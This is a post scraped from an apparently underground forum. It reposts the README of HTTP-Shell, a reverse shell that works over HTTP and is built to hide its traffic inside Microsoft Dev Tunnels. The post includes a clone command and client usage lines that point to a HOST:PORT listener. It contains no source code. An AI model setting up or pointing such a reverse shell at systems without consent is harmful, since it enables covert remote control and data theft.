Damaged - Embrace the Infinite

Step into the world of endless opportunities and unlock the gateway to virtual transactions.

• Domain Update: Our Forum has moved! Please visit us at Damaged.gg for the latest updates.

HTTP-Shell | MultiPlatform HTTP Reverse Shell [2023]

BartowskiRF

Premium member
Premium

0%

Status

Rep

Years of Service

[HIDE] [Image: HTTP-Shell.png]
HTTP-ShellHTTP-Shellis Multiplatform Reverse Shell. This tool helps you to obtain a shell-like interface on a reverse connection over HTTP. Unlike other reverse shells, the main goal of the tool is to use it in conjunction with Microsoft Dev Tunnels, in order to get a connection as close as possible to a legitimate one.
This shell is not fully interactive, but displays any errors on screen (both Windows and Linux), is capable of uploading and downloading files, has command history, terminal cleanup (even with CTRL+L), automatic reconnection and movement between directories.
Requirements
  • Python 3 for Server
  • Install requirements.txt
  • Bash for Linux Client
  • PowerShell 4.0 or greater for Windows Client
DownloadIt is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

Code:[/HIDE]
git clone https://github.com/JoelGMSec/HTTP-Shell
Usage

Code:
# Server _ _ _____ _____ ____ ____ _ _ _ | | | |_ _|_ _| _ \ / ___|| |__ ___| | | | |_| | | | | | | |_) |___\___ \| "_ \ / _ \ | | | _ | | | | | | __/_____|__) | | | | __/ | | |_| |_| |_| |_| |_| |____/|_| |_|\___|_|_| ---------------- by @JoelGMSec ----------------- [!] Usage: HTTP-Server.py [PORT] # Linux CLI [!] Usage: ./HTTP-Client.sh -c [HOST:PORT] -s [SLEEP] (optional) # Windows CLI [!] Usage: .\HTTP-Client.ps1 -c [HOST:PORT] -s [SLEEP] (optional)
The detailed guide of use can be found at the following link:https://darkbyte.net/obteniendo-shells-con-microsoft-dev-tunnels1
LicenseThis project is licensed under the GNU 3.0 license - see the LICENSE file for more details.
Credits and AcknowledgmentsThis tool has been created and designed from scratch by Joel Gmez Molina (@JoelGMSec).
ContactThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can find me on Twitter as@JoelGMSecand on my blogdarkbyte.net.

[Image: Foi1EN5.gif]

ytmnonyy

Premium member
Premium

0%

Status

Rep

Bits

Years of Service

johndoe11021

0%

Status